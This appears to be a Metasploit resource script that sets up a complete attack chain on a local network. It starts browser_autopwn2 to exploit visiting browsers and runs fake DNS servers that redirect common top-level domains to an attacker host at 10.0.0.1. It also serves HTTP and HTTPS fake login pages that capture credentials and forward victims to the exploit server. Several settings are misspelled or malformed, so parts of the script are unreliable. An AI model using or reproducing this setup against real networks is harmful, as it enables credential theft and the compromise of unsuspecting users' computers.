use auxiliary/server/browser_autopwn2
set MAXEXPLOITCOUNT 30
set HTML::base64 double_pad
set MaxSessionCount 20
set VERBOSE true
set LPORT 45000
set SRVHOST 10.0.0.1
set SRVPORT 8081
set URIPATH /try
run -j

use auxiliary/server/fakedns
set LogConsole false
set TARGETHOST 10.0.0.1
set SRVHOST 10.0.0.1
set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu. *.fr
set TARGET ACTION BYPASS
set SRVPORT 5353
run -j

use auxiliary/server/fakedns
set LogConsole false
set TARGETHOST 10.0.0.1
set SRVHOST 10.0.0.1
set TAGETDOMAIN *.com, *.org, *.it, *.net, *.edu, *.fr
set TARGET ACTION BYPASS
set SRVPORT 53
run -j

use auxiliary/server/capture/http
set AUTOPWN_HOST 10.0.0.1
set AUTOPWN_PORT 8081
set AUTOPWN_URI /try
set SRVHOST 10.0.0.1
set TEMPLATE weblogin/index.html
set SRVPORT 80
run -j

use auxiliary/server/capture/http
set AUTOPWN_HOST 10.0.0.1
set AUTOPWN_PORT 8081
set AUTOPWN_URI /try
set SRVHOST 10.0.0.1
set TEMPLATE weblogin/index.html
set SRVPORT 443
set SSL true
run -j
